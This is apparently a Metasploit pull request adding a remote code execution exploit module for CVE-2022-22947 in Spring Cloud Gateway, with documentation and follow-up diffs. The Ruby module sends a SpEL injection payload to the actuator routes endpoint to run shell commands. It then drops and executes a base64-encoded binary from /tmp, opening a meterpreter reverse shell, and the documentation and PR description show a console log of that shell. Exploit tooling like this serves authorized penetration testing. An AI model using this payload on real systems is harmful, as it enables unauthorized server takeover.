### PR TITLE
Add CVE-2022-22947 Spring Cloud Gateway RCE Exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
+++ b/documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
@@ -1,0 +1,66 @@
+## Vulnerable Application
+
+The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an RCE vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947), the versions affected are :
+
+- 3.1.0
+- 3.0.0 to 3.0.6
+- Older, unsupported versions are also affected
+
+This demo [project](https://github.com/wdahlenburg/spring-gateway-demo) can be used to run a vulnerable server 
+    
+### Installation Instructions
+
+```bash
+# To use the pre-compile vulnerable application
+wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
+sudo apt install default-jdk
+java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
+
+
+# If you want to compile for a version of spring cloud gateway on your own
+git clone https://github.com/wdahlenburg/spring-gateway-demo.git
+
+## In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. To see which spring cloud version includes which version of spring cloud gateway, look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
+
+apt install maven
+mvn package -DskipTests
+java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
+```
+
+
+## Verification Steps
+
+- Run the vulnerable server
+- Start msfconsole
+- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
+- Do: `set RHOSTS <server_ip>`
+- Do: `set RPORT 9000`
+- Do: `run`
+- You should get a meterpreter shell.
+
+
+### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
+
+```
+msf6 > use exploit/linux/http/spring_cloud_gateway_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
+RHOSTS => 192.168.19.140
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
+RPORT => 9000
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
+
+[*] Started reverse TCP handler on 192.168.19.140:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if server vulnerable
+[+] Route deleted
+[+] The target is vulnerable.
+[+] Created route successfully with the reverse shell
+[*] Trigerring reverse shell
+[*] Sending stage (3020772 bytes) to 192.168.19.140
+[*] Meterpreter session 1 opened (192.168.19.140:4444 -> 192.168.19.140:59916) at 2022-10-01 14:21:31 -0400
+[+] Route deleted
+[+] Enjoy your Shell
+
+meterpreter >
+```

--- a/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
+++ b/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Cloud Gateway Remote Code Execution',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
+          The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured.
+          An attacker can use SpEL expressions to execute code and take control of the victim machine. This module only supports Linux Droppers.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ayan Saha'
+        ],
+        'References' => [
+          ['CVE', '2022-22947' ],
+          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],
+          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/']
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'Targets' => [
+
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'DisclosureDate' => '2022-03-03',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => []
+        }
+      )
+    )
+  end
+
+  ## Takes in the command and creates a new route with it on the server
+  def run_command(cmd)
+    route_name = Rex::Text.rand_text_alpha(8).downcase
+    uri = "/actuator/gateway/routes/#{route_name}"
+
+    if target['Type'] == :linux_dropper
+
+      data = '{"id": "' + route_name + '", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", \"' + cmd + '\"}).getInputStream()))}"}}], "uri": "http://example.com"}'
+
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'ctype' => 'application/json',
+      'data' => data
+    })
+
+    if res && res.code == 201 && res.message == 'Created'
+      return route_name
+    else
+      return false
+    end
+  end
+
+  ## Cleaning up the routes created
+  def cleanup_route(route_name)
+    uri = "/actuator/gateway/routes/#{route_name}"
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(uri),
+      'ctype' => 'application/json'
+    })
+
+    if res && res.code == 200
+      print_good('Route deleted')
+      return true
+    else
+      print_error("Couldn't delete route. Might require manual cleanup.")
+      return false
+    end
+  end
+
+  def check
+    print_status('Checking if server vulnerable')
+    res = run_command('whoami')
+
+    if res
+      cleanup_route(res)
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  ## Refresh the gateway to trigerr the routes with commands created
+  def refresh
+    print_status('Trigerring reverse shell')
+    uri = '/actuator/gateway/refresh'
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'ctype' => 'application/json'
+    })
+  end
+
+  def exploit
+    file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
+
+    if target['Type'] == :linux_dropper
+      cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name} ; rm -f #{file_name}"
+    end
+
+    res = run_command(cmd)
+
+    if res
+      print_good('Created route successfully with the reverse shell')
+      refresh
+      cleanup_route(res)
+      print_good('Enjoy your Shell')
+    else
+      print_error('Unknown Error')
+    end
+  end
+
+end

--- a/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
+++ b/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
@@ -59,11 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     route_name = Rex::Text.rand_text_alpha(8).downcase
     uri = "/actuator/gateway/routes/#{route_name}"
 
-    if target['Type'] == :linux_dropper
-
-      data = '{"id": "' + route_name + '", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", \"' + cmd + '\"}).getInputStream()))}"}}], "uri": "http://example.com"}'
-
-    end
+    data = '{"id": "' + route_name + '", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", \"' + cmd + '\"}).getInputStream()))}"}}], "uri": "http://example.com"}'
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -124,9 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
 
-    if target['Type'] == :linux_dropper
-      cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name} ; rm -f #{file_name}"
-    end
+    cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name} ; rm -f #{file_name}"
 
     res = run_command(cmd)
 

--- a/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
+++ b/modules/exploits/linux/http/spring_cloud_gateway_rce.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
-          'SideEffects' => []
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
         }
       )
     )


### PR DESCRIPTION
CVE-2022-22947 exploits Spring Cloud Gateway. The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64

This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured.
An attacker can use SpEL expressions to execute code and take control of the victim machine. This module only supports Linux Droppers.

The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/spring_cloud_gateway_rce`
- [ ] `set RHOSTS <server_ip>`
- [ ] `set RPORT 9000`
- [ ] `set payload linux/x64/meterpreter/reverse_tcp`
- [ ] `run`
- [ ] **Verify** A meterpreter shell should pop up

## Scenarios

```
msf6 > use exploit/linux/http/spring_cloud_gateway_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
RHOSTS => 192.168.19.140
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
RPORT => 9000
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run

[*] Started reverse TCP handler on 192.168.19.140:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if server vulnerable
[+] Route deleted
[+] The target is vulnerable.
[+] Created route successfully with the reverse shell
[*] Trigerring reverse shell
[*] Sending stage (3020772 bytes) to 192.168.19.140
[*] Meterpreter session 1 opened (192.168.19.140:4444 -> 192.168.19.140:59916) at 2022-10-01 14:21:31 -0400
[+] Route deleted
[+] Enjoy your Shell

meterpreter >
```

## Vulnerable server for verification

```bash
# To use the pre-compiled vulnerable application
wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
sudo apt install default-jdk
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000


# If you want to compile for a version of spring cloud gateway on your own
git clone https://github.com/wdahlenburg/spring-gateway-demo.git

## In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. To see which spring cloud version includes which version of spring cloud gateway, look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/

apt install maven
mvn package -DskipTests
java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
```


